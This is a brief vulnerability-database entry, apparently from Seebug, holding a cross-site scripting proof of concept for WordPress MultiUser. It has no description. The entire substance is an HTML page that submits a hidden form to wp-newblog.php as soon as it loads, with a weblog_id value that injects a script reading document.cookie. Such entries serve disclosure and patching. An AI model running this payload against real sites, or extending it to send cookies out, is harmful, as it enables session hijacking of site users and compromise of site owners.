WordPress MultiUser crossite scripting PoC

2007-08-25T00:00:00
ID SSV:7163
Type seebug
Reporter Root
Modified 2007-08-25T00:00:00

Description

No description provided by source.

                                        
                                            
                                                <body onLoad="document.hack.submit()">
<form name="hack" action="http://site/wp-newblog.php" method="post">
<input type="hidden" name="stage" value="1">
<input type="hidden" name="weblog_id" 
value='"><script>alert(document.cookie)</script>'>
</form>
</body>